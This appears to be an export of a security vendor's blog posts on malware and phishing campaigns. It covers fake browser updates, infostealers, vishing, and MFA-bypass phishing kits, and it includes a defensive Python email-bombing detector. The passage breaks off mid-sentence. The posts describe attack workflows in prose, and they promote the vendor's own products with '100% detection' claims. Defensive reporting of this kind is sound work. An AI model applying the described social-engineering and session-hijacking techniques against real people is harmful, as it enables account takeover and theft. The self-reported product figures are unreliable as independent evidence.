Businesses should respond to the evolving threat landscape by adopting a\r\ndefense-in-depth approach that includes a DNS filtering solution such as WebTitan, advanced spam filtering\r\nsoftware such as SpamTitan, and ongoing security awareness training and phishing simulations for the workforce\r\nto raise awareness of threats and reduce susceptibility to phishing attempts, using a solution such as SafeTitan.\r\nFake Browser Update Campaign Delivers FrigidStealer Malware to Mac Users\r\nby G Hunt | March 4, 2025 | Phishing \u0026 Email Spam, Spam Software, Website Filtering\r\nThere has been a surge in infostealer malware infections, with detections up almost 60% from the previous year.\r\nInfostealers gather system information, stored files, and sensitive data and exfiltrate the information to their\r\ncommand and control server. Once installed, they can remain undetected for long periods of time, exfiltrating\r\nsensitive data such as usernames and passwords by logging keystrokes, with some variants capable of taking\r\nscreenshots and capturing audio and video by taking control of the microphone and webcam.\r\nThe majority of infostealers are used to attack Windows systems; however, a new infostealer called FrigidStealer\r\nhas been identified that is being used to target Mac users. FrigidStealer is capable of stealing saved cookies,\r\npassword-related files in the Safari and Chrome browsers, and login credentials, along with cryptocurrency wallet\r\ncredentials, Apple Notes containing passwords, documents, spreadsheets, text files, and other sensitive data from\r\nthe user’s home directory. The gathered data is added to a compressed file in a hidden folder in the user’s home\r\ndirectory and is exfiltrated to its command and control server.\r\nThe threat actor behind the campaign distributes FrigidStealer under the guise of important web browser updates\r\non compromised websites. 
The threat actor injects malicious JavaScript into the HTML of the webpage which\r\ngenerates a fake browser update notification to website visitors. The notifications warn the user that they must\r\nupdate their browser to continue to view the page, with the displayed notification tailored to the browser in use.\r\nThe notifications look professional, include the appropriate logos for either Google Chrome or Safari, and contain\r\nan update button that the user must click to proceed. Clicking the button will trigger the download of an installer\r\n(DMG file), which must be manually launched. The user is required to enter their password to get around macOS\r\nGatekeeper protections. If the password is entered, the file is executed and FrigidStealer is delivered.\r\nA similar campaign is being conducted targeting Windows users. The Windows campaign uses similar techniques,\r\nalthough it tricks the user into downloading and executing an MSI installer, which delivers one of two different\r\ninfo stealers, Lumma Stealer or DeerStealer. The threat actor is also targeting Android devices in a similar way,\r\ndelivering an APK file that contains the Marcher banking Trojan.\r\nWith infostealer infections soaring, businesses need to make sure they have the right security solutions in place\r\nand should be providing regular security awareness training to the workforce. Employees should be instructed to\r\nnever download browser updates when prompted to do so on websites or run any suggested commands on their\r\ndevices, as the updates and commands are likely to be malicious.\r\nA web filter is strongly recommended for controlling access to the Internet and blocking visits to malicious\r\nwebsites. 
The WebTitan DNS filter can be used to protect users on or off the network and is constantly updated with\r\nthreat intelligence on new malicious websites. If an attempt is made to visit a known malicious website, that\r\nattempt will be blocked. The web filter can also be configured to block file downloads from the internet by file\r\ntype, allowing IT teams to prevent employees from downloading executable files.\r\nWhile this is a web-based campaign, information stealers are commonly distributed in phishing emails, either\r\nthrough malicious attachments or embedded hyperlinks. TitanHQ’s SpamTitan cloud-based anti-spam service is a\r\npowerful AI-driven email security solution with email sandboxing and advanced threat detection capabilities.\r\nSpamTitan outperformed all other tested solutions in recent tests by VirusBulletin, blocking 100% of phishing\r\nemails and 100% of malware.\r\nThat Google Chrome Installer May be Malware!\r\nby G Hunt | February 28, 2025 | Security Awareness, Website Filtering\r\nA China-based ransomware group, Silver Fox, that has primarily targeted individuals in China, Taiwan, and Hong\r\nKong, has been expanding its attacks outside of those regions and is now conducting attacks more broadly on\r\nmultiple industry sectors. Silver Fox uses ransomware in its attacks and is focused on file encryption, demanding\r\npayment to obtain the keys to decrypt files. While the group does engage in double extortion tactics, stealing data\r\nand threatening to leak that data if the ransom is not paid, data theft is limited. Highly sensitive data is not\r\ngenerally stolen.\r\nMany ransomware groups breach networks and spend time moving laterally to infect the maximum number of\r\ndevices possible and also spend time locating sensitive data to exfiltrate. 
It is often the data theft and threat of\r\npublication that is the main driver behind ransom payments, so much so that some ransomware groups have\r\nabandoned the file encryption element of their attacks. In contrast, Silver Fox is focused on quick attacks, often\r\nbreaching networks and encrypting files on the same day. The group even abandons attacks if lateral movement is\r\nnot possible or if strengthened security is encountered.\r\nSilver Fox primarily gains initial access to victims’ networks by deploying a remote access Trojan called\r\nValleyRAT. ValleyRAT was first identified in 2023 and is believed to be a malware tool developed by Silver Fox,\r\nand its function is to give Silver Fox remote access to networks. The group has extensively targeted individuals in\r\naccounting, finance, and sales since those employees are likely to have access to sensitive data that can be quickly\r\nand easily stolen.\r\nValleyRAT is delivered by multiple means, indicating Silver Fox is trying to infect as many users as possible. One\r\nof the main methods used for distribution is fake installers for popular software. For instance, the group has been\r\nobserved using fake installers for EmEditor (a Windows text editor), DICOM software (for viewing medical\r\nimages), and system drivers and utilities. 
The group has also been observed using a spoofed website offering the\r\nGoogle Chrome browser, which prompts the user to download a ZIP file containing a Setup.exe file, which installs\r\nValleyRAT.\r\nThe methods used to drive traffic to these fake downloads are unclear, although traffic to the fake Google Chrome\r\ndownload site is thought to be generated through malvertising, where malicious adverts are displayed for key\r\nsearch terms related to Chrome and web browsers that redirect users to the drive-by download site, and SEO\r\npoisoning, where black hat SEO techniques are used to get web pages to appear in the search engine listings for\r\nkey search terms. If the user is tricked into executing the fake installer, they will be infected with ValleyRAT and\r\na ransomware attack will rapidly follow.\r\nSince the group is focused on rapid attacks involving minimal effort, the best defense is to strengthen baseline\r\nsecurity and make lateral movement difficult through network segmentation. To prevent ValleyRAT downloads,\r\nweb security needs to be improved to block attempts by users to visit the malicious websites. A web filter is an\r\nideal tool for blocking access, including redirects through malvertising and SEO poisoning. A web filter such as\r\nWebTitan can also be configured to block downloads of certain files from the Internet and restrict access to\r\nwebsites by category – software download sites for example. Ongoing (and regular) security awareness training is\r\nalso vital to teach employees about the risk of downloading software from the Internet, raise awareness of\r\nphishing, and teach security best practices, adding an important human layer to your security defenses.\r\nTitanHQ’s web filter, WebTitan, is easy to implement and use, is automatically updated with the latest threat\r\nintelligence, and provides exceptional protection against web-based threats. 
When coupled with the SafeTitan\r\nsecurity awareness training and phishing simulation platform, businesses will be well protected against ValleyRAT\r\nmalware and other web-delivered malware payloads. Give the TitanHQ team a call to discuss these and other\r\ncybersecurity solutions to better protect you against the growing malware threat.\r\nResearchers Confirm Massive Threat From Information Stealing Malware\r\nby G Hunt | February 27, 2025 | Phishing \u0026 Email Spam, Security Awareness, Spam Software\r\nCybercriminals have extensively used ransomware in their attacks on businesses, government entities, and critical\r\ninfrastructure, and while these attacks often make headline news and cause massive disruption, there is a much\r\nmore common malware threat – information stealers.\r\nInformation stealers are malware that is silently installed on devices and can remain undetected for long periods of\r\ntime. These types of malware have many different capabilities and can serve as downloaders for other malicious\r\npayloads, but their main function is information theft. Information theft is achieved in several ways, depending on\r\nthe malware variant in question. These malware types often have keylogging capabilities and can record\r\nkeystrokes as they are entered on the keyboard, allowing sensitive information such as usernames and passwords\r\nto be captured. They can often record audio from the microphone, take control of the webcam and record video,\r\nand take screenshots. 
They can also steal browser histories, cookies, and other sensitive information.\r\nThe information stolen from the victim allows the threat actor to conduct follow-on attacks, access accounts and\r\nsteal further sensitive data, access and drain financial accounts, or commit identity theft and other types of fraud.\r\nInformation stealers can also provide a threat actor with access to a device, and that access is often sold to\r\nspecialized cybercriminal groups such as ransomware actors. Many hackers now act as initial access brokers,\r\nusing information stealers to gain access before selling that access to other cybercriminal groups.\r\nInformation stealers such as Lumma, AgentTesla, FormBook, Redline, and StealC have been increasingly used in\r\nrecent years, especially last year. Check Point observed a 58% increase in attacks from the previous year, and a\r\nreport from the threat intelligence firm KELA suggested that lists of credentials obtained from information stealers\r\nare being shared on cybercrime forums. The credential lists included billions of logins that had been captured from\r\ninfected devices; according to KELA, around 4.3 million devices were infected, and around 330 million credentials\r\nhad been stolen from them. An estimated 40% were corporate credentials.\r\nThe breach notification service, Have I Been Pwned (HIBP), has recently added 284 million compromised\r\naccounts to the service. The credentials were identified from chats on a Telegram channel called ALIEN\r\nTXTBASE, with the data obtained from information stealer logs. HIBP founder Troy Hunt said the stealer logs\r\nincluded 23 billion rows of data with 493 million unique website and email address pairs and around 284 million\r\nunique email addresses. 
Hunt said 244 million passwords were not previously known to the HIBP service, with\r\n199 million already in its database.\r\nThe extent to which these malware variants are used, and the increase in use in 2024, clearly demonstrates the\r\nimportance of advanced malware protection and the sheer number of compromised credentials suggests many\r\nbusinesses have been infected with information stealers. The problem for businesses is that these malware variants\r\ncan be difficult to identify, as new versions are constantly being released. Traditional antivirus software is\r\nsignature-based, which means it can only detect known malware. When new malware is identified, a signature of\r\nthat malware is obtained and fed into antivirus software. If a malware signature is not in the software’s definition\r\nlist, it will not be detected. There are several ways that these information stealers are distributed, with email being\r\none of the most common. They can also be downloaded from the internet from malicious websites in drive-by\r\ndownloads or installed along with pirated software or doctored versions of legitimate software installers.\r\nDefending against information stealers requires a combination of measures – a defense-in-depth approach, with\r\nmultiple overlapping layers of security. Given the high volume of infections stemming from email, businesses\r\nneed a spam filter to block malicious emails. Antispam software will block many malicious emails; however, an\r\nantispam server must have advanced antimalware defenses. That means traditional signature-based detection and\r\nadvanced behavioral detection to ensure previously unseen malware is identified and blocked.\r\nSpamTitan uses dual anti-virus engines for detecting known threats and a next-generation email sandbox for\r\nbehavioral analysis. 
If standard checks are passed, suspicious messages are sent to the sandbox – a safe\r\nenvironment where they are detonated and their behavior is analyzed. This vastly improves the detection rate, and\r\nin recent independent tests, SpamTitan outperformed all other tested email security solutions and had a 100%\r\nmalware detection rate.\r\nSecurity awareness training needs to be provided to the workforce to ensure that employees have the skills to\r\nrecognize and avoid threats, no matter where they are encountered. Through training, employees should be\r\nconditioned to always report potential threats to their security team, and businesses can promote security best\r\npractices and eradicate risky behaviors. TitanHQ offers businesses a comprehensive training and phishing\r\nsimulation platform – SafeTitan – that has been shown to be highly effective at improving employees’ security\r\nawareness.\r\nMany malware infections occur via the Internet, and while training can reduce risk, a technical security solution is\r\nrequired to block threats. WebTitan is a DNS-based web filter that is used to block access to known malicious\r\nwebsites, assess websites in real-time for malicious content, block certain file downloads from the Internet, and\r\nrestrict the sites and web pages employees can access.\r\nWith these three security solutions in your arsenal, you will be able to significantly improve your security posture\r\nand block information stealers and other threats. Give the TitanHQ team a call today to find out more or take\r\nadvantage of a free trial of these solutions.\r\nSmishing and Vishing Used by Ransomware Group for Initial Access to Corporate\r\nNetworks\r\nby G Hunt | February 26, 2025 | Phishing \u0026 Email Spam, Security Awareness, Website Filtering\r\nA ransomware group called EncryptHub has been accelerating attacks and is now known to have breached the\r\nnetworks of more than 600 organizations worldwide. 
EncryptHub has been active since June 2024 and gains\r\ninitial access to victims’ networks via spear phishing attacks, with initial contact made via SMS messages rather\r\nthan email.\r\nThe group impersonates commonly used corporate VPN products such as Palo Alto GlobalProtect and Cisco\r\nAnyConnect as well as Microsoft 365, and drives traffic to its malicious domains by making contact via\r\npersonalized SMS messages (smishing) or the phone (vishing).\r\nIf vishing is used and the victim is contacted by phone, EncryptHub impersonates a member of the IT helpdesk\r\nand uses social engineering techniques to trick them into disclosing their VPN credentials. The phone number is\r\nspoofed to make it appear that the call is coming from inside the company, or Microsoft Teams phone numbers are\r\nused. The victim is told that there is a problem with the corporate VPN that needs to be resolved, and if the scam\r\nworks, the user is sent a link via SMS that directs them to a domain that resembles the VPN solution used by that\r\ncompany. If the user enters their credentials, they are used in real-time to log in, and if there are any multifactor\r\nauthentication prompts, the threat actor is able to obtain them on the call. After successfully gaining access, the\r\nuser is redirected to the genuine login page for their VPN, and the call is terminated.\r\nAnother tactic used by the group involves SMS messages with a fake Microsoft Teams link with the goal of\r\ncapturing the user’s Microsoft 365 credentials. The user is directed to a Microsoft Teams-related login page and the\r\nthreat actor exploits Open URL parameters on microsoftonline.com to harvest email addresses and passwords,\r\nwhile the user believes they are interacting with the legitimate Microsoft service. 
Once access is gained, the group\r\nuses PowerShell scripts and malware to gain persistence, then moves laterally, steals data, deploys the ransomware\r\npayload, and issues a ransom demand.\r\nThe group’s tactics are highly effective, as in contrast to spear phishing via email, it is difficult to block the initial\r\ncontact via SMS or over the phone. The key to preventing these attacks is improving the security awareness of the\r\nworkforce and using a web filter to prevent the phishing domains from being accessed by employees. TitanHQ’s\r\nweb filter, WebTitan, is a DNS-based web filtering solution that is constantly updated with the latest threat\r\nintelligence from multiple sources to provide up-to-the-minute protection against new phishing domains. Any\r\nattempt to visit a known phishing domain or other malicious site will be blocked, with the user directed to a\r\nlocally hosted block page.\r\nRegular security awareness training for the workforce is vital to teach security best practices and raise awareness\r\nof the tactics used by cybercriminals to breach corporate networks. With the SafeTitan security awareness training\r\nplatform, businesses can easily create training programs tailored for individuals, roles, and departments, and\r\nautomate those campaigns so they run continuously throughout the year, delivering training in small chunks on a\r\nweekly or monthly basis. It is easy to incorporate new training in response to changing threat actor tactics to\r\nincrease awareness of specific threats. The platform also includes a phishing simulator for running phishing\r\nsimulations on the workforce to reinforce training and identify knowledge gaps. If a phishing simulation is failed,\r\ntraining is automatically delivered to the user in real time, relevant to the threat they failed to identify. 
This\r\nensures training is delivered at the point when it is likely to be most effective.\r\nFor more information on TitanHQ solutions, including the WebTitan DNS filter and the SafeTitan security\r\nawareness training platform, give the TitanHQ team a call today. Both solutions are available on a free trial to\r\nallow you to assess them fully before making a purchase decision.\r\nCracked Software Used to Deliver Information Stealing Malware\r\nby G Hunt | February 20, 2025 | Phishing \u0026 Email Spam\r\nInformation stealers are one of the most common ways that initial access is gained to business networks, and the\r\nextent to which these malware variants are used is alarming. According to Hudson Rock, an estimated 30 million\r\ncomputers have been compromised using information stealers in the past few years and Check Point reports that\r\ninfections have increased by 58% in the past year.\r\nCybercriminals specialized in infecting devices distribute their information stealers, which collect sensitive data\r\nsuch as session cookies and login credentials, allowing access to be gained to corporate networks. Oftentimes, the\r\ncybercriminals then sell that access to other cybercriminal groups, acting as initial access brokers. The groups that\r\nthey work with have their own specialisms, such as conducting ransomware attacks. These malware variants are\r\ncapable of stealing large amounts of sensitive information from compromised devices. They can exfiltrate files,\r\nobtain web browser data and passwords, and steal cryptocurrency extensions. 
Infection with an information stealer\r\nhttps://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/\r\nPage 17 of 136\n\ncan result in the large-scale theft of data, compromised accounts, and further attacks, including ransomware\r\ninfections.\r\nSecurity researchers have recently uncovered a new campaign that distributes information stealers such as Lumma\r\nand ACR Stealer via cracked versions of legitimate software. The pirated software can be obtained and used free\r\nof charge, albeit illegally, and is available through warez sites and from peer-to-peer file-sharing networks. The\r\ninstallers have been packaged to silently deliver an information stealer. Cybercriminals often use SEO poisoning\r\nto get their malicious sites to appear high in search engine listings or add malicious adverts to legitimate ad\r\nnetworks (malvertising) to get them to appear on high-traffic websites. The adverts direct internet users to\r\ndownload sites.  Initial contact is also made via email, with workers tricked into opening malicious files that\r\nlaunch scripts that deliver the information stealer payload or direct users to websites where the malware is\r\ndownloaded under the guise of a legitimate program. Contact may also be made via the telephone, with the\r\ncriminals impersonating IT helpdesk staff and tricking employees into downloading the malware.\r\nDefending against information stealers means improving defenses against all these tactics, and that means there is\r\nno single cybersecurity solution or measure that will be effective against them all, but there are three important\r\ncybersecurity measures that you should strongly consider: anti-spam software, a DNS filter, and security\r\nawareness training.\r\nAnti-spam Software\r\nMany malware infections occur via email, either through attachments containing malicious scripts or via\r\nhyperlinks to websites from which malware is downloaded. 
When malicious attachments are used, they are not always detected by anti-spam software and can easily reach end users. To improve detection, email sandboxing is required, where messages are sent to the sandbox for deep inspection. In the sandbox, hyperlinks are also followed to identify any downloads that are triggered. If malicious actions are confirmed, the messages are quarantined, retained for review rather than deleted, and do not reach the inbox.\r\nA DNS Filter\r\nSince many malware infections occur via the Internet, businesses should consider web filtering software. DNS-based web filters allow businesses to control the web content that users can access, block certain file downloads from the internet, and assess web content in real time for malicious content, without the latency associated with other types of web filters. A DNS filter can prevent users from accessing malicious content and will reduce reliance on employees recognizing and avoiding threats.\r\nSecurity Awareness Training\r\nAnti-spam software and DNS filters will greatly improve security; however, employee security awareness also needs to be improved. Through regular security awareness training, businesses can eliminate risky practices and train employees how to recognize and avoid threats. 
By providing training continuously in small chunks throughout the year, businesses can develop a security culture and significantly improve their human defenses.\r\nTitanHQ offers multi-award-winning cybersecurity solutions for SMBs and managed service providers (MSPs) that are easy to implement and offer exceptional protection, including the SpamTitan cloud-based spam filtering service, the WebTitan DNS filter, and the SafeTitan security awareness training and phishing simulation solution. All three solutions are available on a free trial to allow you to see for yourself the difference they make before making a purchase decision. Give the TitanHQ team a call to find out more and to discuss these options, and take the important first step toward improving your defenses.\r\nNew Phishing Kit Bypasses MFA in Real-Time\r\nby G Hunt | February 18, 2025 | Phishing \u0026 Email Spam\r\nA growing number of businesses are implementing multi-factor authentication to add an extra layer of security and improve defenses against phishing attacks. While multifactor authentication (MFA) can prevent unauthorized individuals from accessing accounts using compromised credentials, MFA does not provide total protection. Several phishing kits are sold on hacking forums and Telegram that are capable of bypassing MFA, and a new phishing kit has recently been identified that can intercept credentials in real time and bypass MFA through session hijacking. The phishing kit is being used to steal credentials and access Gmail, Yahoo, AOL, and Microsoft 365 accounts.\r\nThe Astaroth phishing kit has been offered on cybercrime forums since at least January 2025. 
Similar to the Evilginx phishing kit, Astaroth uses a reverse proxy to intercept and manipulate traffic between the victim and the legitimate authentication service of the account being targeted. A cybercriminal can use the Astaroth phishing kit in an adversary-in-the-middle attack, capturing not only login credentials but also 2FA tokens and session cookies, thereby bypassing MFA. The credential theft and session hijacking take place in real time, allowing the cybercriminal to access the user’s account instantly.\r\nThe user is presented with a phishing link, which is commonly delivered via email. If that link is clicked, the user is directed to the attacker’s server and is presented with what appears to be a legitimate login page. The page is served with a valid TLS certificate, so no browser security warnings are generated. The server acts as a reverse proxy: when the username and password are entered, they are captured and forwarded to the legitimate authentication service in real time. The cybercriminal is alerted about the credential capture via the admin panel of the phishing kit or via Telegram, and the one-time passcodes, whether delivered by SMS, push notification, or an authenticator app, are intercepted as they are entered by the user. When the legitimate service issues session cookies, they are immediately hijacked and injected into the attacker’s browser, which means the attacker can impersonate the genuine user without needing their username, password, or 2FA token, since the session has already been authenticated. 
The kit also includes bulletproof hosting and reCAPTCHA bypasses and allows the attacker to access the account immediately, before the user suspects anything untoward has happened.\r\nPhishing kits such as Astaroth are able to render multifactor authentication useless, demonstrating why it is so important to have effective anti-spam software, capable of identifying and blocking the initial phishing emails. SpamTitan is frequently rated as the best spam filter for business due to its ease of implementation and use, exceptional detection, and low false positive rate. TitanHQ also offers MSP spam filtering, with the solution developed from the ground up to meet all MSP needs. In recent independent tests by VirusBulletin, SpamTitan outperformed all other tested email security solutions, achieving the highest overall score thanks to a 100% malware catch rate, 100% phishing catch rate, 99.999% spam catch rate, and a 0.000% false positive rate. The exceptional performance is due to extensive threat intelligence feeds, machine learning to identify phishing attempts, and email sandboxing to detect and block malware and zero-day threats.\r\nIn addition to an advanced spam filtering service, businesses should ensure they provide regular security awareness training to the workforce and reinforce training with phishing simulations. SafeTitan from TitanHQ is an easy-to-use security awareness training platform that makes it easy to create effective training courses and automate the delivery of training content. The platform also includes a phishing simulator with an extensive library of phishing templates that makes it easy to create and automate phishing simulations, generating relevant training automatically if a user is tricked. 
That means training is delivered at the point when it is likely to be most effective at correcting behavior.\r\nGive the TitanHQ team a call today for more information about these solutions. TitanHQ’s SpamTitan and SafeTitan products, like all TitanHQ solutions, are also available on a free trial.\r\nPhishing Campaign Targets European and American Corporate Facebook Accounts\r\nby G Hunt | February 16, 2025 | Security Awareness, Spam Software\r\nA phishing campaign has been identified that targets corporate Facebook credentials and has so far involved more than 12,000 messages to users worldwide. The campaign has primarily targeted enterprises in the European Union (45.5%), United States (45%), and Australia (9.5%), with the phishing emails sent using a legitimate Salesforce automated mailing service. When emails are sent via this service, a sender email address can be specified; however, if no address is supplied, the emails appear to have been sent directly from Salesforce from the noreply@salesforce.com email address, per the terms of service. As such, recipients may mistakenly believe that the emails are official, and because the messages genuinely originate from Salesforce infrastructure, SPF and DKIM checks on the salesforce.com sending domain do not flag them; only the mismatch between the Facebook branding and the Salesforce sender does.\r\nThe emails include fake versions of the Facebook logo, which recipients should be able to identify as fake; however, the emails are well written, and the subject matter is sufficiently concerning to warrant a click. The emails warn the recipient about a copyright infringement claim that has been filed under the Digital Millennium Copyright Act (DMCA) against the user’s personal account, indicating material has been shared via their account that is in violation of copyright laws.\r\nThe messages include the date of the complaint, state that it was reported by Universal Music Group, and attribute it to the unauthorized use of copyrighted music. The recipient is told they must respond to the claim by the close of business if they wish to contest it. 
The date of the required response is only 24 hours after the complaint date, so an immediate response is required. As is common with phishing attempts, there is a threat: permanent restrictions on the user’s Facebook account. The message includes a button to click to contest the claim, but rather than directing the user to a login page, it leads to a fake support page, where they are provided with further information on the restrictions that have been or will be applied. Several variations of that email have been identified, including warnings that Facebook surveillance systems have identified a copyright issue and, as a result, limitations have been placed on the user’s account.\r\nThose restrictions include the disabling of personal ad accounts and audiences, blocking the management of advertising assets or people for businesses, and preventing the user from creating or running ads and managing ad accounts. In order to have those restrictions removed, the user must click the button to request a review, which directs the user to a spoofed Facebook login page. If credentials are entered, they will be captured and used to log in to the user’s account. The campaign, identified by Check Point Research, targets business users, many of whom will rely on Facebook for advertising and customer contact, so the consequences of an account restriction could be serious, and certainly serious enough to warrant filing an appeal. What is unclear is how the threat actor uses the compromised accounts. 
Potentially they could be used for further scams, which could cause considerable reputational damage to the business.\r\nProtecting against these types of phishing campaigns requires a combination of email security and user awareness. An email security solution can prevent these messages from reaching inboxes, thus neutralizing the threat, but security awareness training should also be provided to workforce members to help them identify and avoid phishing attempts. In this case, Facebook admins for the business should be warned about the campaign and instructed to log in to Facebook directly via their web browser if they receive any copyright infringement notices purporting to have been sent by Facebook. If there is a genuine problem with their account, it will be apparent once they log in.\r\nWith the SafeTitan security awareness training platform from TitanHQ, it is easy to create and automate security awareness training programs and roll out new training content in relation to specific threats, only providing that training to the individuals who are likely to be targeted. Phishing simulations can easily be created to test awareness of these phishing scams, with relevant training automatically delivered in response to clicks on phishing emails.\r\nTitanHQ’s anti-spam software, SpamTitan, provides excellent protection against phishing, as demonstrated by recent tests by VirusBulletin. The cloud-based anti-spam service outperformed all other anti-spam solutions in the latest round of tests, blocking 100% of phishing emails and 100% of malware, earning SpamTitan the top spot for overall score. If you are not happy with your anti-phishing defenses or feel you are paying too much for protection, give the TitanHQ team a call and ask about SpamTitan. 
If you have yet to provide regular security awareness training to your workforce, why not sign up for a free trial of SafeTitan and put the product to the test on your workforce?\r\nEmail Bombing: What You Need to Know to Protect Your Business\r\nby G Hunt | February 3, 2025 | Phishing \u0026 Email Spam, Security Awareness, Spam Software\r\nInvestigations of cyberattacks have identified an increasing number of incidents that started with email bombing. A high percentage of cyberattacks involve phishing, where emails are sent to employees to trick them into visiting a malicious website and disclosing their credentials, or opening a malicious file that installs malware. Email bombing is now being used to increase the effectiveness of phishing campaigns.\r\nWith email bombing, the user is sent a large number of spam emails in a short period of time, such as by adding the user to a large number of mailshots, news services, and spam lists. The threat actor creates a genuine spam problem, then impersonates a member of the IT department and claims they can fix it, with contact often made via a Microsoft Teams message. If the user accepts, they are tricked into installing remote access software and granting the threat actor remote access to their device. The threat actor will establish persistent access to the user’s device during the remote access session. What starts with an email bombing attack often ends with a ransomware attack.\r\nThere are several measures that you should consider implementing to prevent these attacks. If you use Microsoft Teams, consider restricting calls and messages from external organizations, unless there is a legitimate need to accept such requests. If so, ensure permission is only given to trusted domains, such as those of business partners. 
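One control the post does not spell out is detecting the bombing phase itself: the burst of subscription and newsletter mail is visible at the mail gateway minutes before the fake "IT helpdesk" makes contact, and a helpdesk ticket raised at that point gets ahead of the Teams message. The detector below is an added example written for this page, not TitanHQ code or a SpamTitan feature. The log line format ("timestamp sender recipient subject"), the domains and the thresholds are assumptions, and the traffic it runs over is constructed in the `constructed_log` function.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed gateway log line format: <ISO timestamp> <sender> <recipient> "<subject>"
WINDOW = timedelta(minutes=10)
MIN_MESSAGES = 30          # messages to one recipient inside the window
MIN_DISTINCT_SENDERS = 15  # bombing uses many unrelated lists; a mail loop or monitor uses one sender


def parse_line(line: str):
    ts, sender, rcpt, subject = line.split(" ", 3)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), sender.lower(), rcpt.lower(), subject.strip('"')


def detect_email_bombing(lines, window=WINDOW, min_messages=MIN_MESSAGES,
                         min_senders=MIN_DISTINCT_SENDERS):
    """Sliding window per recipient; alert once when volume and sender diversity both cross the thresholds."""
    recent = defaultdict(deque)  # recipient -> (timestamp, sender) pairs, oldest first
    alerted, alerts = set(), []
    for line in lines:  # lines must be in time order
        ts, sender, rcpt, _ = parse_line(line)
        q = recent[rcpt]
        q.append((ts, sender))
        while ts - q[0][0] > window:  # drop everything older than the window
            q.popleft()
        senders = {s for _, s in q}
        if rcpt not in alerted and len(q) >= min_messages and len(senders) >= min_senders:
            alerted.add(rcpt)
            alerts.append({"recipient": rcpt, "first_seen": q[0][0].isoformat(),
                           "last_seen": ts.isoformat(), "messages": len(q),
                           "distinct_senders": len(senders)})
    return alerts


def constructed_log():
    """Constructed sample traffic: one bombed mailbox, one noisy but benign monitor, one normal user."""
    base = datetime(2025, 2, 3, 9, 0, 0)
    lines = []
    for i in range(40):  # bob: signed up to 40 different lists within five minutes
        t = base + timedelta(seconds=7 * i)
        lines.append(f'{t:%Y-%m-%dT%H:%M:%SZ} news@list{i:02d}.example bob@corp.example "Confirm your subscription"')
    for i in range(40):  # dave: 40 alerts from one monitoring system, not a bombing
        t = base + timedelta(seconds=6 * i)
        lines.append(f'{t:%Y-%m-%dT%H:%M:%SZ} alerts@monitor.corp.example dave@corp.example "Disk usage warning"')
    for i in range(5):   # carol: ordinary traffic
        t = base + timedelta(seconds=50 * i)
        lines.append(f'{t:%Y-%m-%dT%H:%M:%SZ} billing@vendor{i}.example carol@corp.example "Invoice {1040 + i}"')
    return sorted(lines)  # ISO-8601 timestamps sort lexically, so this orders the lines by time


def demo():
    return detect_email_bombing(constructed_log())


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

Only bob's mailbox is reported: dave receives just as many messages, but from a single sender, which is what the sender-diversity threshold is for. On a real gateway export the alert should open a ticket to the user's actual IT contact, so that any "helpdesk" approach over Teams or phone in the following hour is treated as suspect until it is confirmed through that ticket.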
The use of remote access tools should be restricted to authorized personnel only, and steps should be taken to prevent the installation of these tools, including using a web filter to block downloads of these tools (and other executables) from the Internet.\r\nA spam filter should be implemented to block spam and unwanted messages. Advanced spam filters such as SpamTitan use AI-guided detection and machine learning to block spam, phishing, and other malicious emails, along with email sandboxing to identify novel threats and zero-day malware. In the Q4 2024 tests at VirusBulletin, the SpamTitan spam filtering service blocked 99.999% of spam emails, 100% of phishing emails, and 100% of malware with a 0.000% false positive rate, earning SpamTitan top position out of all anti-spam software under test.\r\nBusinesses should not underestimate the importance of security awareness training and phishing simulations. Regular security awareness training should be provided to all members of the workforce to raise awareness of the tactics used by cybercriminals. A cyberattack is much more likely to occur as a result of a phishing or social engineering attempt than the exploitation of a software vulnerability. Businesses that use the SafeTitan security awareness training platform and phishing simulator have reduced susceptibility to email attacks by up to 80%. For more information on TitanHQ cybersecurity solutions, including award-winning anti-spam solutions for managed service providers, give the TitanHQ team a call or take advantage of a free trial of any of TitanHQ’s cybersecurity solutions.\r\nMicrosoft 365 Accounts Targeted Using Sneaky 2FA Phishing Kit\r\nby G Hunt | January 31, 2025 | Phishing \u0026 Email Spam, Security Awareness, Spam News\r\nAs the massive cyberattack on Change Healthcare demonstrated last year, the failure to implement multifactor authentication on accounts can be costly. 
In that attack, multifactor authentication was not implemented on a Citrix server, and stolen credentials allowed access that resulted in the theft of the personal and health information of 190 million individuals. The ransomware attack caused a prolonged outage, and remediation and recovery cost Change Healthcare an estimated $2.9 billion last year.\r\nThe attack should serve as a warning for all companies that multifactor authentication is an essential cybersecurity measure: if passwords are compromised, access to accounts can still be prevented. Unfortunately, multifactor authentication protection can be circumvented. Threat actors are increasingly using phishing kits capable of intercepting multifactor authentication codes in an adversary-in-the-middle attack. Phishing kits are packages offered to cybercriminals that cover all aspects of phishing. Once purchased, phishing campaigns can be conducted with minimal effort, as the phishing kit provides copies of websites that impersonate well-known brands, the infrastructure for capturing credentials, and templates for phishing emails. After paying the fee, all that is required is to supply the email addresses for the campaign, which can be easily purchased on hacking forums.\r\nSome of the more advanced phishing kits are capable of defeating multifactor authentication by harvesting Microsoft 365 and Gmail session cookies, which are then replayed to circumvent MFA on subsequent access. One of the latest phishing kits to be identified has been dubbed Sneaky 2FA. The kit was first identified as being offered and operated on Telegram in October 2024 by researchers at the French cybersecurity firm Sekoia. 
The researchers identified almost 100 domains that host phishing pages created by the Sneaky 2FA phishing kit.\r\nAs with a standard phishing attack, phishing emails are sent to individuals to trick them into visiting a phishing page. One campaign using the Sneaky 2FA phishing kit uses payment receipt-related emails to trick the recipient into opening a PDF file attachment containing a QR code that directs the user to a Sneaky 2FA page on a compromised website, usually a compromised WordPress site. These pages have a blurred background and a login prompt, and Microsoft 365 credentials are required to access the blurred content. The phishing pages automatically pre-fill the user’s email address in the login prompt, so they are only required to enter their password. To evade detection, multiple measures are employed, such as traffic filtering, Cloudflare Turnstile challenges, and CAPTCHA checks.\r\nMany phishing kits use reverse proxies for handling requests; however, the Sneaky 2FA phishing server handles communications with the Microsoft 365 API directly. If the checks are passed, JavaScript code is used to handle the authentication steps. When the password is entered, the user is directed to the next page, and the victim’s email address and password are sent to the phishing server via an HTTP POST. The phishing server submits them to Microsoft, which responds with the 2FA method configured for the victim’s account; that response is returned to the phishing page, which prompts for the corresponding factor. The phishing kit allows session cookies to be harvested that provide account access, regardless of the 2FA method: Microsoft Authenticator, one-time password code, or SMS verification.\r\nPhishing kits 